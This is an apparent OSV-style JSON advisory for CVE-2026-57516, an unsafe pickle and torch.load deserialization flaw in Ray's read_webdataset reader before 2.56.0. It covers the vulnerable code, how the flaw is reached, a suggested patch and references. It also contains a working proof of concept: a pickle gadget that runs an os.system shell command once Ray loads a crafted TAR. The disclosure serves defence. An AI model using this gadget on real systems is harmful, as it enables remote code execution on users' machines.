{"id":"CVE-2026-57516","aliases":["GHSA-hhrp-gw25-jr43","PYSEC-2026-2273"],"url":"https://o3.security/vulnerability/CVE-2026-57516","summary":"Ray < 2.56.0 Unsafe Deserialization RCE via WebDataset Reader","details":"## Summary\n\n`ray.data.read_webdataset(paths=...)` is a `@PublicAPI(stability=\"alpha\")`\nreader for WebDataset-format TAR files. Its default `decoder=True` invokes\n`_default_decoder` on every sample's keys, which routes file extension to a\ndecoder by extension. Two of those branches deserialize attacker-controlled\nbytes with no validation:\n\n- `.pickle` / `.pkl` -> `pickle.loads(value)`\n- `.pt`     / `.pth` -> `torch.load(io.BytesIO(value), weights_only=False)`\n\nBoth fire during a standard `ray.data.read_webdataset(...).take_all()` /\n`.iter_batches()` call. No flags, no opt-in, no environment variable.\nAn attacker who can supply a TAR (via S3 share, HuggingFace Hub mirror,\nemail attachment, model-zoo, or any HTTP URL the user passes to\n`read_webdataset`) achieves arbitrary code execution in the calling\nRay process at schema-sample time, before row data is consumed.\n\nThis is the same class of bug as GHSA-mw35-8rx3-xf9r (Parquet Arrow\nExtension Type cloudpickle deserialization, patched in 2.55.0): standard\ndata-loading API, attacker-controlled file format, deserialization gadget\ninvoked transparently. The 2.55.0 patch addressed\n`tensor_extensions/arrow.py:_deserialize_with_fallback` and made cloudpickle\nopt-in via `RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1`. The\nWebDataset path is a different code site and was not touched.\n\n## Vulnerable code (HEAD `a157d4d`)\n\n`python/ray/data/_internal/datasource/webdataset_datasource.py` lines\n175-225, the `_default_decoder` function:\n\n```python\ndef _default_decoder(sample, format=True):\n    sample = dict(sample)\n    for key, value in sample.items():\n        extension = key.split(\".\")[-1]\n        ...\n        elif extension in [\"pt\", \"pth\"]:\n            import torch\n            # PyTorch 2.6 changed torch.load default weights_only=True, which\n            # breaks loading general Python objects previously serialized for\n            # WebDataset .pt payloads.\n            sample[key] = torch.load(io.BytesIO(value), weights_only=False)   # line 219\n        elif extension in [\"pickle\", \"pkl\"]:\n            import pickle\n            sample[key] = pickle.loads(value)                                 # line 223\n    return sample\n```\n\nThe comment for the `.pt/.pth` branch is itself a security smell: it\ndocuments that the maintainer chose `weights_only=False` *to override*\nPyTorch 2.6's safer default. The comment treats this as a compatibility\nfix; it functionally re-enables an arbitrary-code-execution path that\nupstream PyTorch closed.\n\n## Reachability and default-on confirmation\n\n`python/ray/data/read_api.py:2289` defines `read_webdataset` with default\n`decoder=True`:\n\n```python\n@PublicAPI(stability=\"alpha\")\ndef read_webdataset(\n    paths,\n    *,\n    ...\n    decoder: Optional[Union[bool, str, callable, list]] = True,\n    ...\n) -> Dataset:\n    ...\n    datasource = WebDatasetDatasource(paths, decoder=decoder, ...)\n```\n\n`WebDatasetDatasource._read_stream` (line 367) calls the decoder\nunconditionally when not None:\n\n```python\nfor sample in samples:\n    if self.decoder is not None:\n        sample = _apply_list(self.decoder, sample, default=_default_decoder)\n```\n\n`True is not None` evaluates True, so the default decoder fires for every\ninvocation that doesn't explicitly pass `decoder=None` (or a custom safe\ndecoder). The documentation does not warn about the behavior.\n\n## End-to-end reproduction\n\nTested on a fresh venv (`pip install ray[data]`) on Linux x86_64. Ray\nreports `__version__ == \"2.55.1\"` (the patched-against-GHSA-mw35 release):\n\n```python\nimport io, os, pickle, subprocess, tarfile, tempfile, sys\n\nMARKER = \"/tmp/ray_webdataset_poc_rce_marker\"\n\nclass Gadget:\n    def __reduce__(self):\n        cmd = (f\"/bin/sh -c \\\"printf 'RCE via ray.data.read_webdataset\\\\n\"\n               f\"pid=%s\\\\nuser=%s\\\\n' \\\"$$\\\" \\\"$(whoami)\\\" > {MARKER}\\\"\")\n        return (os.system, (cmd,))\n\nwith tempfile.NamedTemporaryFile(suffix=\".tar\", delete=False) as f:\n    tar_path = f.name\nwith tarfile.open(tar_path, \"w\") as tar:\n    for name, body in ((\"000000.txt\", b\"hello\"),\n                       (\"000000.pkl\", pickle.dumps(Gadget()))):\n        ti = tarfile.TarInfo(name=name); ti.size = len(body)\n        tar.addfile(ti, io.BytesIO(body))\n\nimport ray, ray.data\nray.init(num_cpus=2, ignore_reinit_error=True, log_to_driver=False)\nds = ray.data.read_webdataset(paths=[tar_path])\nrows = ds.take_all()\nassert os.path.exists(MARKER), \"no RCE\"\nprint(open(MARKER).read())\n```\n\nOutput:\n\n```\nray version: 2.55.1\ncrafted /tmp/tmpjpos115h.tar (10240 bytes)\nds.take_all() returned 1 row(s)\nRCE CONFIRMED:marker at /tmp/ray_webdataset_poc_rce_marker:\n    RCE via ray.data.read_webdataset\n    pid=248816\n    user=xyz\n```\n\nThe `.pt/.pth` variant is the exact same primitive against the\n`torch.load(io.BytesIO(value), weights_only=False)` branch; replace the\nTAR member with `000000.pt` containing `torch.save(Gadget())` to reproduce.\n\n## Real-world delivery vectors\n\n- `paths=[\"s3://bucket/poisoned.tar\"]` -- the user thinks they are reading\n  a WebDataset shard; the bucket is shared, mis-permissioned, or\n  compromised.\n- `paths=[\"https://attacker/model.tar\"]` -- HTTP-served WebDataset.\n- HuggingFace Hub -- WebDataset is a recognized HF dataset format; users\n  pull TAR shards via `datasets` and feed them to Ray Data.\n- Model-zoo / leaderboard tarballs -- common in CV/ASR workflows.\n\n## Why GHSA-mw35 doesn't cover this\n\nGHSA-mw35-8rx3-xf9r patched `tensor_extensions/arrow.py:_deserialize_with_fallback`\nby gating `cloudpickle.loads` behind\n`RAY_DATA_AUTOLOAD_CLOUDPICKLE_TENSOR_METADATA=1`. That change touches\nthe Parquet ExtensionType deserialization path only. The advisory text\ndoes not mention WebDataset, the WebDataset code is in a different\nmodule, and the unsafe loads here use `pickle.loads` and\n`torch.load(weights_only=False)` (not `cloudpickle.loads`).\n\n## Suggested patch\n\nTwo minimal options, both Ray-internal:\n\n1. **Make the unsafe extensions opt-in**, mirroring the GHSA-mw35 fix\n   pattern. Replace the `.pt/.pth` and `.pkl/.pickle` branches with a\n   guard:\n\n   ```python\n   import os\n   _ALLOW_UNSAFE = os.environ.get(\n       \"RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE\", \"0\"\n   ) == \"1\"\n\n   elif extension in [\"pt\", \"pth\"]:\n       if not _ALLOW_UNSAFE:\n           raise ValueError(\n               f\"Refusing to load .pt/.pth member {key!r} from WebDataset \"\n               f\"with weights_only=False. Set \"\n               f\"RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 only for trusted \"\n               f\"sources.\"\n           )\n       sample[key] = torch.load(io.BytesIO(value), weights_only=False)\n\n   elif extension in [\"pickle\", \"pkl\"]:\n       if not _ALLOW_UNSAFE:\n           raise ValueError(\n               f\"Refusing to unpickle WebDataset member {key!r} -- \"\n               f\"untrusted pickle is RCE. Provide your own decoder \"\n               f\"or set RAY_DATA_WEBDATASET_ALLOW_UNSAFE_PICKLE=1 for \"\n               f\"trusted sources.\"\n           )\n       sample[key] = pickle.loads(value)\n   ```\n\n2. **Drop these branches from the default decoder entirely** and require\n   callers to provide their own decoder when working with .pkl/.pt\n   samples. This is the safer default, matches WebDataset upstream's\n   guidance (\"by default, use safe decoders\"), and is consistent with\n   the spirit of the GHSA-mw35 patch.\n\nEither option flips the default-on RCE primitive into an explicit\nopt-in. The current default-on behavior provides no signal to users\nthat calling `ray.data.read_webdataset` on an untrusted TAR is\nequivalent to running attacker code.\n\n## References\n\n- Source: `python/ray/data/_internal/datasource/webdataset_datasource.py:175-225`\n- Public API: `python/ray/data/read_api.py:2287-2370` (`read_webdataset`)\n- Sibling advisory of the same class: GHSA-mw35-8rx3-xf9r (Parquet\n  Arrow Extension Type, patched 2.55.0)\n- Earlier related advisory: PR #45084 (2024) fixed PyExtensionType\n  cloudpickle but did not touch the WebDataset decoder.\n- WebDataset format: https://github.com/webdataset/webdataset","published":"2026-07-01T16:36:55.765Z","modified":"2026-09-25T03:48:59.596826901Z","cvss":null,"epss":{"score":0.00858,"percentile":0.56503,"asOf":"2026-09-15"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"ray","fixedVersion":"2.56.0"}],"fix":{"url":"https://github.com/ray-project/ray/pull/63469","label":"ray-project/ray#63469"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/57xxx/CVE-2026-57516.json"},{"type":"ADVISORY","url":"https://github.com/ray-project/ray/releases/tag/ray-2.56.0"},{"type":"ADVISORY","url":"https://github.com/ray-project/ray/security/advisories/GHSA-hhrp-gw25-jr43"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-57516"},{"type":"ADVISORY","url":"https://www.vulncheck.com/advisories/ray-unsafe-deserialization-rce-via-webdataset-reader"},{"type":"FIX","url":"https://github.com/ray-project/ray/pull/63469"},{"type":"FIX","url":"https://github.com/ray-project/ray/pull/63470"},{"type":"PACKAGE","url":"https://github.com/ray-project/ray"},{"type":"WEB","url":"https://github.com/ray-project/ray/commit/41443a18f9e6403a072de69098a279c23e2d943c"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/ray/PYSEC-2026-2273.yaml"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-25T03:48:59.596826901Z"}}